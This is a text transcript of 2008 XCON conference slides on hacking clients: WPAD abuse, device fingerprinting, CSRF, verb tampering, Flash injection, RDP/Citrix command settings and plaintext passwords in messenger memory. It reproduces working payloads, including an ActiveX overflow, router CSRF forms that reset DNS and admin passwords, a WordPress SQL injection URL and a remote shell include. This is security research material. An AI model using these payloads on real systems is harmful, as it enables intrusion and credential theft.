Xfocus xcon 2008_aks_oknock
Transcript of Xfocus xcon 2008_aks_oknock
Rolling Balls – Can You Hack Clients?
Aditya K SoodSecNiche Security
http://www.secniche.org
The Applied Insecurities / Exploitation
2
Who Am I?
Research Front:• Founder , SECNICHE Security.• Independent Security Researcher.• Lead IS Author for Hakin9 Organization.• Research Author for USENIX and ELSEVIER Journals.• Like to do Bug Hunting. Released Advisories to Forefront
Companies.• Active Speaker at Security Conferences.• Team Lead – Evil Fingers Community.• Projects – CERA, MLABS, SCHAP etc.
Professional Front:Work as a Security Advisor / Penetration Tester for KPMG Consultancy.
Well Something Nice About
Me.
3
Agenda – Moving Forward
The Discussion
Path1. Discovering Clients on Internet / Intranet.
Web Application Discovery ProtocolFingerprinting Embedded Devices.Rogue Request for HTTP Server Fingerprinting.JavaScript Based Client Information Retrieval
2. Client Side Attack Patterns.Pluggable Protocol Handlers. Active X Exploitation through Object Parameter.JavaScript Jacking JSON Injections [CSRF]HTTP Verb Jacking HTTP Verb Tampering.Insecure Parametric Design of Cookies Baking with XSS.War XHR and IFRAME Exploiting Patterns.Cross Site Request Forging (Embedded Devices) The High Risk.Surf Jacking Jacking HTTPS in Traffic Pool.FPI Flash Parameter Injections : Attack URI
3. Web Virtual Environment [RDP/ CITRIX]
4. Instant Messenger Encryption Attacks.
5. Case Study OBS Hacking Threats.
GENERAL Conceptual Briefings
4
Will You able to Hack Clients ?
You Require Versatile
Attack Patterns + Web 2.0
Vulnerabilities Maximum Knowledge Maximum Intruding.
Driving on Insecurity in Client Side.
5
Web 1.0 !== Web 2.0
What a Change in Application World !
6
Why Client Side?
• User Interface with the Browsers to Access Content Remotely.• Client System Stores Sensitive Information as Local Cache.• Scripting – an Intermediate Model of Client Server Relation.• No Executables Required , Just Manipulation through Scripts.• Follows the Concept of Spoofing and Hidden Codes.• Exploitable through JS-Jacking and VBS-Jacking with number of
Attacks.• Browsers – The Bulls Eye , Attacker Prime Target.• The Concept – Exploitation On the Fly.• Exploitation Trend Change towards Application.• Application Level Attacks Easy to Trigger and Execute.
7
Web 2.0 Application Model
8
Integrity – Security Web Relation
9
Client Hacking Basic Concept
Well Clients Not allowed to have a thought , Just Action.
Our Attacks Work on Clients Inability and Application Flaws
to Trigger.
Just Engage and Let them Work Acc to You.
10
Discovering Clients on Web
Discover and Fingerprinting Information of Client Systems
INTERNET | INTRANET
11
Discovering Clients on Web
• Discovering Clients leverage lot of Sensitive Information.• Network and System Configuration is the Target Point to Attack.• Internet , Search Engines Like Google Projects Plethora of Information.• Attacking Intranet Requires the Inside Information of Party.• Garbage Dumps on World Wide Web Servers , A Huge Bonus for
Attackers.• Client Side Supports various Protocols [Weak] for Robust Functionality. • Insecure Administration of Servers – Configuration Mismanagement.• Browser Based Insecurities.• JavaScript Jacking on Client Browsers Reveal State Information of
Clients.• Every Single Element Discovered, Favors the Attack on Client.
12
Discovering Clients on Web
• Protocol used in Discovering Network Proxy Automatically.• Configuration File Contains Intranet Addresses Inherently.• Protocol Dismantle the Manual Configuration to Detect Proxy (PAC) File.• WPAD Works on DHCP Behavior. [DHCPINFORM Query]• No DNS Lookup is Required if DHCP Issues a Request.• Protocol Handler http://wpad.xxxx.com• PAC Proxy Auto Configuration | Proxy Settings for Subnets.• DHCP Query through Uniform Resource Locator [URL]• DNS Query through wpad.dat , File Located in WPAD Root Directory• Function FindProxyForURL()
WPAD Web Proxy Auto Discovery Protocol
13
Discovering Clients on Web
• Attack Point • wpad.dat is Not Stored in a Secure Manner. Should be Placed in Default
Virtual Directory.• Browsers have Stringency in Making a Request to wpad.dat if Stored in
Root Directory.• No Referrer Check on the Request to wpad.dat File.• wpad.dat When a Request is issued it Redirects the page to Required
Proxy File for Configuration of Browser.• Malicious Redirection Can be Done.• When a DHCP Request is Issued no DNS Required. WOW ! No DNS
Cache Poisoning is Required.• Rogue DHCP Server on LAN do the Trick.• Wpad use JavaScript to Set Browsers for Proxy Settings.
WPAD Web Proxy Auto Discovery Protocol
14
Discovering Clients on Web
# WPAD definitionoption wpad code 252 = text;
# Suppress WPAD activity - no cache, no DNS.option wpad "\n\000";
# Configure a valid WPAD cache. The \n is required for Windows.# All config below this line is optional.#option wpad "http://www.example.com/wpad.pac\n";
# Special config for Windows ("MSFT 5.0") systems.# Note this does not catch Windows CE.class "MSFT" {match if substring(option vendor-class-identifier, 0, 4) = "MSFT";
# They put 252 on the DHCPINFORM's, but not on the DHCPREQUEST's# PRL. So we over-ride the PRL to include 252 = 0xFC, which will also# suppress the DHCPINFORMS!option dhcp-parameter-request-list =concat(option dhcp-parameter-request-list, fc);}
function FindProxyForURL(url, host){return "PROXY 192.168.0.1:3128 ; DIRECT";}
WPAD Web Proxy Auto Discovery Protocol
15
Discovering Clients on Web
WPAD Web Proxy Auto Discovery Protocol
Proof of Concept - DEMO
16
Discovering Clients on Web
• Criticality in Determining the Internal Structure.• HTTP Request Parameters are Manipulated.• 301 Moved Permanently Response Code is thrown.• Devices used to Spoof the Internal IP Addresses.• Every Device has its Own Working Approach• Used to Set Cookie in a Different Manner.• Used to Change the parameter of HTTP Header Specifies.• Analyzing the change in HTTP Headers Play the Trick.• Necessary for Application Pen Testing at Infrastructural Level
Embedded Devices – Load Balancers , Proxies etc
17
Discovering Clients on Web
Response Check 1
HTTP/1.1 200 OK\r\nDate: Tue, 05 Jul 2007 17:05:18 GMT\r\nServer: Server\r\nVary: Accept-Encoding,User-Agent\r\nContent-Type: text/html; charset=ISO-8859-1\r\n
nnCoection: close\r\n Transfer-Encoding: chunked\r\n
Response Check 2- send: 'GET /?Action=DescribeImages&AWSAccessKeyId=0CZQCKRS3J69PZ6QQQR2&Owner.1
=084307701560&SignatureVersion=1&Timestamp=2007-02-15T17%3A30%3A13 &Version=2007-01-03&Signature=<signature removed> HTTP/1.1\r\nHost: ec2.amazonaws.com:443\r\nAccept- Encoding: identity\r\n\r\n' reply: 'HTTP/1.1 200 OK\r\n' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header: Date: Thu, 15 Feb 2007 17:30:13 GMT
send: 'GET /?Action=ModifyImageAttribute&Attribute=launchPermission&AWSAccessKeyId =0CZQCKRS3J6 9PZ6QQQR2&ImageId=ami-00b95c69&OperationType=add&SignatureVersion=1& Timestamp=2007- 02-15T17%3A30%3A14&UserGroup.1=all&Version=2007-01-03&Signature=<signature removed> HTTP/1.1\r\nHost: ec2.amazonaws.com:443\r\nAccept-Encoding: identity\r\n\r\n' reply: 'HTTP/1.1 400 Bad Request\r\n' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header:
Date: Thu, 15 Feb 2007 17:30:14 GMT header: nnCoection: close
Embedded Devices – HTTP Header Manipulation
Net ScalarDevice
18
Discovering Clients on Web
HTTP/1.1 200 OKDate: Tue, 10 July 2007 03:01:36 GMTServer: Apache Connection: closeContent-type: text/plain
HTTP/1.0 404 Not Found\r\nXontent-Length: \r\nServer: thttpd/2.25b 29dec2003\r\nContent-Type: text/html; charset=iso-8859-1\r\nLast-Modified: Tue, 05 Jul 2007 17:01:12 GMT\r\nAccept-Ranges: bytes\r\nCache-Control: no-cache, no-store\r\nDate: Tue, 05 Jun 2007 17:01:12 GMT\r\nContent-Length: 329\r\nConnection: close\r\n
Embedded Devices – HTTP Header Manipulation
RADWAREDevice
The Content Parameter is transformed into XONTENT. This is
Generally Shown by Potential RADWARE Devices
19
Discovering Clients on Web
Response Check 1
Cookie: service-http=167880896.12345.0000.ASPSESSIONIDSSCATCAT = XXXXXXXXXXXXXXXXXXX
Converting to Binary:
Binary ( cookie ) == 00001010000000011010100011000000
Converting to blocks of 4 00001010000000011010100011000000
00001010 1000000001 110101000 16811000000 192
Embedded Device F5 Big IP Load Balancer HTTP POOL – Cookie Dissection Check
Lets dissect the Pattern of this
Number.
Convert it into Decimal to see what is there.
The Internal IP Dissected is 192.168.1.10This Layout is specific to Working Devices
20
Discovering Clients on Web
Embedded Devices Demonstration - Discovering
Proof of Concept - DEMO
21
Discovering Clients on Web
• Fingerprinting HTTP Servers with Rogue Requests.• Web Servers React Stringently to Different Requests.• The Response Code can be used to Analyze the Web Server.• 80% of this Request-Response is Successful.
HTTP Servers Fingerprinting with Rogue Requests
22
Discovering Clients on Web
• Client Side JavaScript Can Leverage Lot of Information of Browser State.
Platform : Win32OSCPU : undefinedUserAgent : Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3)
Gecko/2008092417 Firefox/3.0.3Language : en-USAppName : NetscapeAppVersion : 5.0 (Windows; en-US)Product : GeckoCodeName : 2008092417Vendor : VendorSub : CodeName : MozillaHistory : 3ScreenW : 1440ScrrenH : 900
Information Extraction through JavaScript Calls.
<script language="javascript"> function browserInfo(form) { var txtInfo; txtInfo =
"Platform : " + window.navigator.platform + "\n" + "OSCPU : " + window.navigator.oscpus + "\n" + "UserAgent : " + window.navigator.userAgent +
"\n" + "Language : " + window.navigator.language+ "\n" + "AppName : " +
window.navigator.appName + "\n" + "AppVersion: " + window.navigator.appVersion + "\n" +
"Product : " + window.navigator.product + "\n" + "CodeName : " + window.navigator.productSub + "\n" + "Vendor : " + window.navigator.vendor +
"\n" + "VendorSub : " + window.navigator.vendorSub + "\n" + "CodeName
: " + window.navigator.appCodeName + "\n" + "History : " + window.history.length + "\n" + "ScreenW : " + window.screen.width + "\n" +
"ScrrenH : " + window.screen.height;
form.txtOutput.value=txtInfo; return; } </script>
23
The Internet Today ! WOW!
24
Client Side Attack Weapons
Client Side Exploiting Patterns
25
Attack Patterns – The Client Attack Base
• Pluggable Protocol Handlers. • Active X Exploitation through Object Parameter.• JavaScript Jacking JSON Injections [CSRF]• HTTP Verb Jacking HTTP Verb Tampering.• Insecure Parametric Design of Cookies Baking with XSS.• War XHR and IFRAME Exploiting Patterns.• Cross Site Request Forging (Embedded Devices) The High
Risk.• Surf Jacking Jacking HTTPS in Traffic Pool.• FPI Flash Parameter Injections : Attack URI
26
[1] Pluggable Protocol Handlers
• Attack works with XSS etc Vulnerabilities.• Browsers support for the Application Handlers.• Easy to Trigger through number of Applications.• Third Party Attack Base.
GOOGLE CHROME Browser Support
protocol_handler": {"excluded_schemes": {
"afp": true,"data": true,"disk": true,"disks": true,"file": true,"hcp": true,"javascript": true,"mailto": false,"ms-help": true,"news": false,"nntp": true,"shell": true,"snews": false,"vbscript": true,"view-source": true,"vnd": {
"ms": {"radio": true
}
The handlers are deadly when fused with certain Web Vulnerabilities.
27
Pluggable Protocol Handlers
• Telnet Protocol Handler through an Exploited URL
Third Party Connection Initiation from Vulnerable
URL. Attack Projected through Telnet Handler.
28
[2] Active X Exploitation - Applications
• Active X Exploitation Application at Risk.• Dynamically Generated Objects hitting the Running Application.• Prime target is to find the Vulnerable Object.• Operations can be based on Objective or Fuzzing. • Objects are Specified as:
<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>Object Parameters to Trace:
• Class SomeClass• GUID: {some-guid}• Number of Interfaces:• Default Interface: • RegKey Safe for Script: F/T• RegKey Safe for Init: F/T• KillBitSet: F/T
Yahoo Messenger 8.1
Object ID
Restricting Use of Control in IE is done by setting Kill Bit
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\
29
Active X Exploitation - Applications
• CLSID Class ID is the Parent Key. • PROGID Program ID is the Subkey.• HKEY_CLASSES_ROOT\CLSID is alias to
HKEY_LOCAL_MACHINE\Software\Classes\CLSID.• GUID Determines the Safe for Scripting
Yahoo Messenger 8.1
Active X Exploit –Milw0rm
<html><body>
<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object><script language=vbscript>
arg1=String(517140, "A")target.c arg1
</script></body></html>
GONE
30
[3] JavaScript Jacking – The Evil Inside
• JavaScript – The Most Critical and Most Usable Scripting Entity.• Irrevocably Supported by Every Browsers.• Active base for Malicious Web Base Content.• Helps in Diversified Client Side Hacking from the Core.• Dynamic Generated Object Malfunctioning.• JS-Jacking Leveraging System Specific Information.• Attacker Can query Browser Related Information.• Active Encoding Attacks Fused with JavaScript.• DOM Based Calling Pattern for Web Based Attacks.
Website Requires JavaScript Support. This anatomy works in both positive and negative
manner
31
JavaScript Jacking – The Evil Inside
• JavaScript – The Attack Entities
JavaScript has an Interface with the Projected Entities.
32
JavaScript Jacking – The Evil Inside
• JavaScript – Favorable Attacks through JavaScript
Cross Site Scripting (XSS)
DOM Based XSS
Cross Site Request Forging (CSRF)
Cross Site Tracing (XST)
Malicious Script Injections
JavaScript Worms
JavaScript Encoding AttacksCookie Stealing
<script></script><object></object>
Document.cookie , document.domainAlert(‘XSS”);
<iframes></iframes><img src=“”></img>
<html><marquee></marquee></html>
33
JavaScript Jacking – The Evil Inside
• JSON Injections The Serialization Insecurity | Web 2.0• Direct Injections with Encoding.• Everything is treated as String. Apply toJSONObject().• CSRF A different way to Fuse attack with Notation Objects.{
"menu":{
"id": "<img src="https://books.example.com/clickbuy?book=ISBNhere&quantity=100">",
"value": "<img src="https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y">",
"popup": "<scriptsrc="https://www.google.com/accounts/UpdateEmail?service=adsense&[email protected]&Passwd=cool&save="></script>"
}}
} Cross Site Request Forgery
Structured in JSON – Google
Ad sense Layout.
34
[4] HTTP Request Manipulation – Verb Jacking
• HTTP Stateless Protocol. Every Request is Independent of other.• HTTP supports number of Request.• HTTP Verb Jacking Play with HTTP Requests like GET/POST.• Attack Affect Applications handling XML Data. Versatile Attack.• Request Schema is Defined in web.xml file.• HTTP Request Functionality is Placed in web.xml File.• Verb Jacking == Verb Tampering.• Exists for a Long Period of Time.• HTTP 1.0 and HTTP 1.1 Plays a Part.
In 2006 , I have released a paper called Rogue XML
Specifications which list the potential insecurities in
web.xml file. http://packetstormsecurity.org/papers/general/RogueXMLSpe
cific.pdf
Major Flaw HTTP End Point Check does not Disseminate among HTTP Request. Only
Parameter Check is Performed. All Verbs are Allowed.
35
HTTP Request Manipulation – Verb Jacking
<security-constraint><web-resource-collection>
<web-resource-name>drivers</web-resource-name><description>
Security constraint for drivers page</description>
<url-pattern>/drivers.html</url-pattern>
<http-method>POST</http-method><http-method>GET</http-method>
</web-resource-collection><auth-constraint>
<description>constraint for drivers
</description><role-name>manager</role-name>
</auth-constraint></security-constraint>
<login-config>
<auth-method>BASIC</auth-method></login-config>
<security-role><role-name>manager</role-name>
</security-role>
The snapshot of web.xml file for a certain target. The
security constraint parameter defines the allowed request. The type of Authentication
allowed.
J2EE ,JSP , ASP , ASP.NET,PHP etc are based on configuration files to process the type
of request to handle. [ GET/POST/HEAD etc]
HTTP Verb Jacking Manager directories will not be Accessed by
GET/POST Request. What about
HEAD Request.
36
HTTP Request Manipulation – Verb Jacking
• Reflective Points on Verb Jacking.• Semantic and Syntactic Manipulation. Configuration Check.• Session Object Plays a Specific Role when Direct Operations to be Done.• Syntactic Check Referrer Check / Validation Check etc.• Semantic Check Configuration Check.
Apache
IIS
Tomcat
VulnerableVersions /
Configurations
VERB Jacking Attacks
37
[5] Insecure Parametric Cookies – Baking with XSS
• Insecure Use of Cookies in Session Management.• Where the Security State is ? Majority Fails to Instantiate.• XSS Drags in the Application. Authenticated Cookies can be Undertaken.• The Real Cause Insecure Design of Cookies with Parameters.
Cookie SecurityParameter
Check
Cookie Security Design is Judged by two major factors:1. Cookie over Secure Channel [HTTPS ]
2. Cookie Extraction through JavaScript Calls.
Cookie Security Parameters are :-Secure ( boolean) Allowed over only HTTPS.
HttpOnly ( boolean ) JavaScript document.cookie Fails.
Hardly we find Cookies Design
ss Secure. Wow One can Hack.
38
[6] WAR Dissecting XHR and IFRAME
• XHR XML HTTP DOM based API for XML Data Transference.• Active Mechanism based on AJAX.• XHR Request does not Cached in the History of Browser.• IFRAME Requests have a proper History Caching Layout.• XHR Requests are Irreversible. IRAME is totally Reverse.• Working Functionality of both are Different from Each other.• Number of Client Side Attacks are Exploited by using these Elements.
If your browser do not support Ajax XHR request and a page is loaded into browser then the most of the remote toolkits have a hidden iframe to provide fake XHR support to the page.
39
WAR Dissecting XHR and IFRAME
<script >var oRequest = new XMLHttpRequest();var sURL =
"http://www.snapdrive.net/files/571814/chrome.txt";alert('Downloading a txt file..please wait.');oRequest.open("GET",sURL,false);
oRequest.setRequestHeader("User-Agent",navigator.userAgent);oRequest.send(null);xmlDoc=oRequest.ResponseText;alert(xmlDoc);if (oRequest.status==200)
{ alert('Done...now try editing the Text-Box!');
var str=" Winget 3.0 DoS Exploit PoC.Minimize Winget & Right-Click & Copy to clipboard.";document.write(str.link("http://"+oRequest.responseText+".exe"));
}else
{alert('Error executing XMLHttpRequest call!');}
Local Dos [Milw0rm]
var iframe = document.createElement("IFRAME"); iframe.setAttribute("src", 'ftp://localhost/anything'); iframe.setAttribute("name", 'myiframe'); iframe.setAttribute("id", 'myiframe'); iframe.setAttribute("onload", 'read_iframe("myiframe")'); iframe.style.width = "100px"; iframe.style.height = "100px";
document.body.appendChild(iframe);
Konqueror 3.5.5 Crash [Milw0rm]
http://www.milw0rm.com/exploits/6777http://www.milw0rm.com/exploits/3512
XHR Malicious URI Exploit
[Word Press SQL Injection through IFRAME]wp-
content/plugins/st_newsletter/stnl_iframe.php?newsletter=-
9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
[PHP Nuke IFRAME]http://www.example.com/nuke_path/iframe.php?file=ftp://user:[email protected]/public_html/shell.html
(or) .htm
40
[7] CSRF Embedded Devices [HIGH RISK]
• Cross Site Request Forging in Embedded Devices.• Exploiting the Flaw and Fusing with CSRF for Hard Execution.
[1] Cisco Router Remote Administration Execution CSRF Exploit [Milw0rm]<html> <body> <body onload="fdsa.submit();">
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx">
<input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-">
</body> </html>
[2] A-Link WL54AP3 and WL54AP2 CSRF [Milw0rm]<html> <body onload="document.wan.submit();
document.password.submit()"> <form action="http://192.168.1.254/goform/formWanTcpipSetup" method="post"
name="wan"> <input type="hidden" value="dnsManual" name="dnsMode" checked> <input type="hidden" name="dns1" value="216.239.32.10">
<input type="hidden" name="dns2" value="216.239.32.10"> <input type="hidden" name="dns3" value="216.239.32.10">
<input type="hidden" name="webWanAccess" value="ON" checked="checked"> </form> <form action="http://192.168.1.254/goform/formPasswordSetup" method="post"
name="password"> <input type="hidden" name="username" value="mallory"> <input type="hidden" name="newpass" value="gotroot">
<input type="hidden" name="confpass" value="gotroot"> </form> </body> </html>
[3] EXPLAY CMS CSRF Exploit<img src="http://explay.localhost/admin.php?name
=users&page=1&order=user_id&set_admin=2" />
41
[8] Surf Jacking HTTPS Protection at Stake
• Vulnerable Play with HTTPS Websites.• Surf Jacking [HTTPS] is an Outcome from Side Jacking [HTTP].• Basic Flaw is In Cookie Setting by Respective Servers.• All Insecure Cookie Based Website at Risk. Side Jacking
discovered by Errata Security.
Surf Jacking discovered by Enable
Security
But Cookie Insecurity is known back time.
Greets to break down into Attacks.
42
[9] Flash Parameter Injections
• Injecting Global Variables in Flash.• Active URL Based SWF Files are Vulnerable Point.• Parameters that can be Injected or Insecure Flash Objects.
System.security.loadPolicyFileExtracting URL:- getURL , getLocal
Load Events:load*(URL,..) Functions
loadVariables(url, level )LoadMovie ( url, target )LoadMovieNum( url, level )XML.load ( url )LoadVars.load ( url ) Sound.loadSound( url , isStreaming ); NetStream.play( url );
Field Setup:TextField.htmlText [ Metadata Checks ]
Conversion Checks: Flash to XMLtry { __flash__toXML(); } catch(e) { Undefined; }try{code}catch(e){location.reload()}
Variable Initializations- Global / Local_level_root_global
FPI based on DOM : Adobe FPI Vulnerability
Elementsfunction showFlash(swf, w, h, loop){
var myLocation = encodeURI(document.location);s += '<param name="FlashVars" value="'+
'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />'
document.write(s);}
Shared ObjectsmySharedObject = SharedObject.getLocal("sharedObjName"); mySharedObject.data.name = “XXXXX";mySharedObject.data.homepage = “Vulnerable HTTP Link";mySharedObject.flush();
asfunction:getURL,javascript:alert(‘XSS’)”
<object><embed src="movie.swf" flashvars="location= "> </embed> </object>
43
Client Hacking
Client Virtual Environment Intrinsic Play with ICA Client and RDP[MTS]
44
Conceptual Briefing – ICA | RDP
• Virtual Environment for Clients to Produce Interface with Servers.• Executing Commands and GUI Operations Generically.• ICA Independent Computing Architecture , CITRIX Applications• RDP Remote Desktop Protocol , Microsoft Proprietary Protocol.• Basically , Virtual Desktop Working Functionality.• Protocols Defined have Different Working Behavior for ICA and RDP• Application ( RDP ) MTS i.e. Microsoft Terminal Services.• Clients Exist for almost all Platforms [*Nix, Windows etc].• ICA Similar to X Window System / XEN Virtual Environment.• RDP Client RDC + TSC
RDC Remote Desktop Connection.TSC Terminal Services Connection.
45
Conceptual Briefing – ICA | RDP
Citrix Web ICA File: Webica.ini
• Trusted and Un-trusted Distinction Client Modeling Check.• It depicts the trusted behavior of ICA Client from its Origin Point using the
webica.ini file.• Trusted ( ICA Client ) Program Neighborhood / PN Agent.• Un-Trusted ( ICA Client ) Web Interface / Direct ICA File Execution.
Structured Dependency over webica.ini file. It is used to set Access Rights.
Citrix Application Server File: Appsrv.ini
• Custom ICA Connections are defined in it.• Information about Entries in Remote Connection Manager.
46
The Positive Attack Point – CITRIX ICA
Citrix Desktop Connection parameters provide a functionality to feed a specific Command which will get executed when a connection is initiated to the server
by the client. Usually instead of the desktop the command gets executed.
• [ApplicationServers]• Desktop=•• [Desktop]• TransportDriver=TCP/IP• BrowserProtocol=UDP• DesiredHRES=4294967295• DesiredVRES=4294967295• ScreenPercent=0• DoNotUseDefaultCSL=Off• Description=Desktop• Address=citrix.msdsb.net• InitialProgram=#ROGUE or MALICIOUS COMMAND• IconPath=M:\Program Files\Citrix\ICA Client\pn.exe• IconIndex=1• ConnectType=1• MaximumCompression=Off• UseAlternateAddress=0• Compress=On
47
The Positive Attack Point – MTS RDP
Microsoft Terminal Services RDP has inbuilt option of executing command through shell directly which is a possible attack
point of Infection.
• screen mode id:i:1• desktopwidth:i:800• desktopheight:i:600• session bpp:i:16• winposstr:s:0,3,0,0,800,572• full address:s:www.intlogistics.com• alternate shell:s: Malicious or rogue Command• compression:i:1• keyboardhook:i:2• audiomode:i:0• redirectdrives:i:0• redirectprinters:i:1• redirectcomports:i:0• redirectsmartcards:i:1• displayconnectionbar:i:1• autoreconnection enabled:i:1• username:s:freight
48
GOOGLING for Random Targets :ICA
49
GOOGLING for Random Targets : RDP
50
Attacking RDP | CITRIX
Proof of Concept - Demo
51
Client Hacking
Client Side Memory Encryption FlawsInstant Messengers ( SKYPE , PIDGIN etc)
52
Instant Messenger Encryption Flaws
• Inability of Encrypting Password in Memory.• Credentials are Stored in Memory for Active Functionality with
Sessions.• No Encryption is applied for Credentials Integrity.• Passwords remain in the Memory in Clear Text.• No Hashing Mechanism is used.• The Encryption is Applied as Half Process. Used after Local Memory
Storage.• No Salts are used to Harden the Password Usage.• Application Flaw and No Stress has been Laid on it.• Number of Messengers are Affected due to Inappropriate Handling.• Memory Dumps provide Raw Data with Clear Text Credentials.
53
Instant Messenger Encryption Flaws
• Attacks are Based on Memory Dumps Extraction.• Design Problems in an Instant Messaging Application.• Clear Text Credentials Lead to Brute Force Attacks.• Object Usage is not Properly Defined Related to Password Handling
Procedures.• Optimization problems Result in Local Cache Storage.• Ability of Memory Retrieval Tools to Extract Dump.• Unsecured Security Model in Practice.• Access Objects are not Used Properly.
Stringency Little Hard to Search Credentials in Raw Dump.
54
Instant Messenger Encryption Flaws
PMDump Process Memory Dumper in Action
55
Instant Messenger Encryption Flaws
SKYPE - RAW Dump
56
Instant Messenger Encryption Flaws
Proof of Concept – Demo
PIDGIN Client.
57
Client Hacking
Hotspots – The Real Hacking SpotsWIFI – Wireless in the Wild.
58
Hotspots – Wireless in the Wild
• Hotspots Public Locations for Internet Access.
• WIFI Working Functionality through Access Points.
• Access Points Beacon Signals after specific Time Slots.
• Working (Ethernet) != Working (Wireless)
• Breaking down the Myth of Physical Layer of Security.
• Everything is in the Air , Wireless Signals.
\
59
Hotspots – Wireless in the Wild
Hotspots Can be:
• Public Available Internet.
• Corporate Guest Network
• Open Network.
• Malicious Network.
• Rogue Network.
Network is Free To Connect.
No Working Mode Security
60
Hotspots – Wireless in the Wild
• Versatility in Hotspot Attack Vector • Insecure Wireless Connection. • Hotspot is mainly a kind of ADHOC Network• Weakness in Encryption Protocol. WEP Keys Attack. • Generic Credentials are used for Connection Access. Can be NULL.• Can be a Peer to Peer Network. • Attack Vector is more Diversified as Guest Network.• Scanning is very Easily. Hotspots are Open Listeners for Connection.• Weakley Secured Networked or Totally Unsecured.
61
Hotspots – Wireless in the Wild
• Proceeding with the Attack The Hack Steps• Scanning the Incessant Hotspot with Wireless Enabled Device.• SSID can be Easily Extracted for the Required Targets.• Signal Strength Access Point Availability for Connection.• Hotspots Provide Number of Free Services. Quiet Good for Us.• Infrastructure Devices Resources for Hotspot.• Attacks Sniffing , Spoofing , Eavesdropping etc.• Vulnerability Check for Devices used in Wireless Hotspots.• Metasploit Can be Useful in Exploiting Potential Targets.
62
Client Hacking – A Study
OBS Hacking Threats – Ripple Effect
63
What is OBS?
• OBS Stands for Online Banking Services.• OBS work directly as Business Ecosystem.• Based on the Concept of Distributed Service Management with
Centralized Service Orientation.• Mostly all Banks , Corporate Finance Companies etc Use these Services.• OBS Implements along Number of Parties.• Triggering a Single Flaw on Persisting Service Impacts in a Distribute
Manner• Direct Impact – Client Systems• OBS Ripple Effect is Critical Part of it.
64
Imperial View of OBS Ecosystem
• OBS Ecosystem based on the Concept of Business Niche• Niche Encompasses Security, Reliability and Flexibility to be Provided• Criticality Factor is High Monetary Transaction are Involved.• Working Functionality Service Oriented Architectures (SOA)• Transaction Management XML Transference Mechanism.
The Ecosystem Layout.
65
OBS Ecosystem : Ripple Effect
The Attack Components
66
Well We are All Done, NOW !
Thanks for Knowledge Sharing.
Questions ?
Or Lets Meet Together after this for more Sharing
67
Thanks and Regards
XCON XFOCUS
We Appreciate Your Efforts.
68
Find Us at:
©SecNichehttp://www.secniche.org